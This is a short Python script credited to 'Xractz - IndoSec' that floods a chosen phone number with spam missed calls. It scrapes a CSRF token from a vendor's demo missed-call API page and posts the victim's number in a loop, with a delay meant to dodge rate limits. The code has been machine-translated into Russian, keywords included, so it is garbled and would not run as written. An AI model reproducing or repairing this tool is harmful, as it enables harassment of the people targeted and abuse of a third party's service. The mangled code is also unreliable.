#Xractz
#IndoSec

 время импорта , re , sys
из  запросов  import  Session
s  =  Сессия ()

print ( "Спам-вызов от Xractz - IndoSec \ n Этот инструмент задерживает 5 секунд для каждого спама, чтобы не ограничивать! \ n Используйте код страны (например: 62xxxxx29)" )
попробуйте :
	no  =  int ( input ( "Нет:" ))
	jml  =  int ( input ( " Количество :" ))
	печать ()
кроме :
	print ( " \ n \ t * Только число *" )
	sys . выход ()
	
url  =  "https://www.citcall.com/demo/misscallapi.php"

tkn  =  s . получить ( URL ). текст
токен  =  ре . findall ( r'id = "csrf_token" value = "(. *?)"> ' , tkn ) [ 0 ]

заголовки  = {
	'x-запрошенный-с' : 'XMLHttpRequest'
}
data  = {
cid : нет ,
'пытается' : '0' ,
'csrf_token' : токен
}

п  =  0
попробуйте :
	пока  n  <  jml :
		отправить  =  s . сообщение ( URL , данные = данные , заголовки = заголовки ). текст
		время . сон ( 4.8 )
		если  «Успех»  в  посыле :
			п  + = 1
			print ( f "[ { n } ] Отправлено => { нет } " )
		еще :
			print ( " \ n \ t * Лимит *" )
			print ( " \ n \ t * Попробуйте час назад или попробуйте завтра *" )
			сломать
кроме :
	print ( " \ n \ t * ОШИБКА *" )
	sys . выход ()
